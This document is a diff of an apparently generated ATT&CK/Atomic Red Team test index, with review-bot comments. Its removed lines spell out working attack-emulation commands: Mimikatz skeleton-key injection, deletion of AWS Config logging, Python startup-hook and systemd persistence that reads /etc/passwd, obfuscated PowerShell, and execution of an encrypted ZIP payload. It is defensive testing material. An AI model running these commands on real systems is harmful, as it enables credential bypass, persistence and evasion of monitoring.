Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27579,7 +27576,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31976,7 +31972,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32012,7 +32008,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32498,7 +32493,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32528,7 +32523,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34416,7 +34410,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34443,7 +34437,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34845,7 +34838,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44747,7 +44739,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44777,7 +44769,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56560,7 +56551,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
+47 -2315
View File
@@ -2048,10 +2048,10 @@ defense-evasion:
$encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo="
$bytes = [System.Convert]::FromBase64String($encodedString)
$decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
#write the decoded eicar string to file
$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
Ignore
$decodedString | Out-File T1027.013_decodedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
name: powershell
elevation_required: false
- name: Decrypt Eicar File and Write to File
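Review bot: the added cleanup_command `Just delete the resulting T1027.013_decodedEicar.txt file.` is prose, not a PowerShell command; the executor (`name: powershell`) will try to run it and fail, leaving the decoded EICAR file on disk, which is exactly the artifact an AV-detection test must clean up. The removed form `Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction Ignore` was correct. The output path also regresses from `$env:temp\T1027.013_decodedEicar.txt` to the bare filename, so the file lands in whatever the current working directory happens to be when the test runs. Keep the `$env:temp` path and the `Remove-Item` cleanup on the new side.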
@@ -2066,59 +2066,15 @@ defense-evasion:
command: |-
$encryptedString = "76492d1116743f0423413b16050a5345MgB8AGkASwA0AHMAbwBXAFoAagBkAFoATABXAGIAdAA5AFcAWAB1AFMANABVAEEAPQA9AHwAZQBjAGMANgAwADQAZAA0AGQAMQAwADUAYgA4ADAAMgBmADkAZgBjADEANQBjAGMANQBiAGMANwA2AGYANQBmADUANABhAGIAYgAyAGMANQA1AGQAMgA5ADEANABkADUAMgBiAGMANgA2AGMAMAAxADUAZABjADAAOABjAGIANAA1ADUANwBjADcAZQBlAGQAYgAxADEAOQA4AGIAMwAwADMANwAwADAANQA2ADQAOAA4ADkAZgA4ADMAZQA4ADgAOQBiAGEAMAA2ADMAMQAyADYAMwBiAGUAMAAxADgANAA0ADYAOAAxADQANQAwAGUANwBkADkANABjADcANQAxADgAYQA2ADMANQA4AGIAYgA1ADkANQAzAGIAMwAxADYAOAAwADQAMgBmADcAZQBjADYANQA5AGIANwBkADUAOAAyAGEAMgBiADEAMQAzAGQANABkADkAZgA3ADMAMABiADgAOQAxADAANAA4ADcAOQA5ADEAYQA1ADYAZAAzADQANwA3AGYANgAyADcAMAAwADEAMQA4ADEAZgA5ADUAYgBmAGYANQA3ADQAZQA4AGUAMAAxADUANwAwAGQANABiADMAMwA2ADgANwA0AGIANwAyADMAMQBhADkAZABhADEANQAzADQAMgAzADEANwAxADAAZgAxADkAYQA1ADEAMQA="
$key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32
$decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
$decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
#Write the decrypted eicar string to a file
$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force
-ErrorAction Ignore
$decryptedString | out-file T1027.013_decryptedEicar.txt
cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
name: powershell
elevation_required: false
- name: Password-Protected ZIP Payload Extraction and Execution
auto_generated_guid: c2ca068a-eb1e-498f-9f93-3d554c455916
description: |
Extracts and executes a script from a password-protected ZIP archive.
This technique is commonly used by malware families like Emotet and QBot to deliver payloads
via email attachments where the password is provided in the message body.
The encrypted ZIP evades static file analysis until extracted at runtime.
Upon successful execution, displays confirmation and system information.
supported_platforms:
- linux
- macos
input_arguments:
zip_password:
description: Password used to protect the ZIP archive
type: String
default: infected
dependency_executor_name: bash
dependencies:
- description: 'zip and unzip must be installed
'
prereq_command: 'which zip && which unzip
'
get_prereq_command: 'echo "Install zip and unzip using your package manager
(apt-get, yum, or brew)"
'
executor:
command: |
echo '#!/bin/bash' > /tmp/art_payload.sh
echo 'echo "T1027.013: Payload extracted from encrypted ZIP"' >> /tmp/art_payload.sh
echo 'echo "Hostname: $(hostname)"' >> /tmp/art_payload.sh
echo 'echo "User: $(whoami)"' >> /tmp/art_payload.sh
echo 'uname -a' >> /tmp/art_payload.sh
cd /tmp && zip -P "#{zip_password}" art_encrypted.zip art_payload.sh
rm /tmp/art_payload.sh
echo "Encrypted ZIP created. Extracting with password..."
unzip -P "#{zip_password}" -o /tmp/art_encrypted.zip -d /tmp/
echo "Executing extracted payload:"
bash /tmp/art_payload.sh
cleanup_command: |
rm -f /tmp/art_payload.sh
rm -f /tmp/art_encrypted.zip
name: bash
T1014:
technique:
type: attack-pattern
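Review bot: same regression as the previous hunk for the decrypted EICAR file (a prose `cleanup_command` and `out-file T1027.013_decryptedEicar.txt` into the working directory instead of `$env:temp`), and in addition the hunk header `-2066,59 +2066,15` shows the whole 'Password-Protected ZIP Payload Extraction and Execution' test (auto_generated_guid c2ca068a-eb1e-498f-9f93-3d554c455916) being removed with nothing replacing it. If the atomic YAML for that test still exists under T1027.013, the index generator is silently skipping it; if the test was deliberately retired, that belongs in the commit message. The removed test's cleanup (`rm -f /tmp/art_payload.sh`, `rm -f /tmp/art_encrypted.zip`) is complete, so there is no hygiene reason to drop it.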
@@ -23901,22 +23857,6 @@ defense-evasion:
'
name: command_prompt
- name: Obfuscated PowerShell Command via Character Array
auto_generated_guid: 6683baf0-6e77-4f58-b114-814184ea8150
description: "Spawns a child PowerShell process using character array obfuscation.
\nBoth the PowerShell binary name and executed command are constructed \nfrom
ASCII values at runtime to evade string-based detection.\n"
supported_platforms:
- windows
executor:
command: |
$ps = [char[]](112,111,119,101,114,115,104,101,108,108)
$cmd = [char[]](83,116,97,114,116,45,80,114,111,99,101,115,115,32,99,97,108,99,46,101,120,101)
& (-join $ps) "-Command" (-join $cmd)
cleanup_command: |
taskkill /f /im calculator.exe >nul 2>nul
taskkill /f /im CalculatorApp.exe >nul 2>nul
name: powershell
T1556.006:
technique:
type: attack-pattern
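Review bot: `-23901,22 +23857,6` removes the 'Obfuscated PowerShell Command via Character Array' test (auto_generated_guid 6683baf0-6e77-4f58-b114-814184ea8150) from the index with no replacement. As with the other dropped entries in this comparison, confirm whether the source atomic was removed or the generator missed it; because this file is generated output, a missing entry here silently hides the test from anything that consumes the index. The removed content itself was complete: its cleanup terminates both `calculator.exe` and `CalculatorApp.exe`, covering both calculator process names.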
@@ -27184,61 +27124,6 @@ defense-evasion:
get_prereq_command: 'gcloud auth login --no-launch-browser
'
- name: AWS - Config Logs Disabled
auto_generated_guid: 4608bc1b-e682-466b-a7d7-dbd76760db31
description: 'Disables AWS Config by stopping the configuration recorder, deleting
the delivery channel, and deleting the configuration recorder. An attacker
with sufficient permissions can use this to stop configuration change recording
and avoid detection of subsequent activity.
'
supported_platforms:
- iaas:aws
input_arguments:
configuration_recorder_name:
description: Name of the configuration recorder
type: string
default: redatomictestconfigurationrecorder
delivery_channel_name:
description: Name of the delivery channel
type: string
default: redatomictestdeliverychannel
region:
description: Name of the region
type: string
default: us-west-2
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
default profile using: aws configure
'
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo Please install terraform and configure your AWS
default profile
'
executor:
command: |
aws configservice stop-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder stopped ***"
aws configservice delete-delivery-channel --delivery-channel-name #{delivery_channel_name} --region #{region}
echo "*** Delivery channel deleted ***"
aws configservice delete-configuration-recorder --configuration-recorder-name #{configuration_recorder_name} --region #{region}
echo "*** Configuration recorder deleted ***"
cleanup_command: aws configservice list-configuration-recorders --region us-west-2
name: sh
elevation_required: false
T1564.003:
technique:
type: attack-pattern
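Review bot: `-27184,61 +27124,6` removes the entire 'AWS - Config Logs Disabled' test (auto_generated_guid 4608bc1b-e682-466b-a7d7-dbd76760db31). Beyond the generated-versus-intentional question that applies to every dropped entry in this diff, this is the one entry whose removed `cleanup_command` (`aws configservice list-configuration-recorders --region us-west-2`) never restored the recorder or delivery channel and hard-coded the region instead of using `#{region}`, and whose terraform dependency is unused by the executor; if the test is re-added, fix those in the same change.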
@@ -27965,7 +27850,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -27995,54 +27880,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1027.006:
technique:
type: attack-pattern
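Review bot: `-27995,54 +27880,7` both drops `identifier: T1556.001` and replaces the 'Skeleton Key via Mimikatz' test (auto_generated_guid 0ee8081f-e9a7-4a2e-a23f-68473023184f) with `atomic_tests: []`. This is the entry most worth tracking explicitly: its cleanup ends with `Restart-Computer -Force` and its description restricts it to an isolated domain controller, so maintainers need to know whether it is gone on purpose or lost by the generator. Also, on the removed lines, the dependency description `Mimikatz must be present on the host machine at` is cut off after 'at'; if the test comes back, complete it with the existing `#{mimikatz_path}` argument.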
@@ -46437,7 +46275,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -46473,239 +46311,7 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
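Review bot: the populated `atomic_tests` list for T1546.018 (the Python startup-hook tests, ending with the usercustomize.py Linux/macOS test) is replaced by a bare `atomic_tests: []`, so this index no longer carries any test for the technique. If the index is now produced by the Python conversion, an emptied list usually means the generator did not find or resolve the per-technique tests rather than that they were retired; please verify the generator output against the source YAML before merging, and if the removal is deliberate, say so explicitly. A smaller point on the lines being removed, in case they are re-added: the Linux and macOS `cleanup_command` blocks `exit 0` when the artifact is missing while the Windows one does `exit 1`, which makes the missing-artifact case report differently per platform.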
@@ -52597,7 +52203,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
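Review bot: the `name` field changes from `'System Services: Systemctl'` to `Systemctl`, dropping the parent-technique prefix that ATT&CK uses for sub-technique display names, while the neighbouring STIX fields (`modified`, `object_marking_refs`) are untouched. Confirm that storing the bare sub-technique name is the intended output of the conversion and that anything consuming this index by matching on the full display name is updated in the same change, otherwise this rename silently breaks those lookups.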
@@ -52620,586 +52226,7 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests:
- name: Create and Enable a Malicious systemd Service Unit
auto_generated_guid: e58c8723-5503-4533-b642-535cd20ec648
description: |
Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
to establish persistence or execute arbitrary commands under the context of systemd.
This simulates the full attacker workflow: writing the unit file, reloading the systemd
daemon, enabling the service to survive reboots, and starting it immediately. This is
consistent with techniques observed in ransomware precursor activity and post-exploitation
frameworks targeting Linux infrastructure.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the malicious service to create
type: string
default: atomic-test
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable.
Ensure systemd is installed."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_service_output.txt
- name: Create systemd Service Unit from /tmp (Unusual Location)
auto_generated_guid: a1fa406e-2354-4a24-b6d6-94157e7564d4
description: |
Creates a systemd service unit file in /tmp and loads it using systemctl start with
an absolute path. Adversaries may write service unit files to world-writable directories
such as /tmp to avoid triggering alerts on new file creation in standard service
directories, or to execute payloads transiently without permanently installing a service.
Loading a service unit from an arbitrary path rather than a standard systemd directory
is unusual behaviour that should be detectable by monitoring systemctl command arguments.
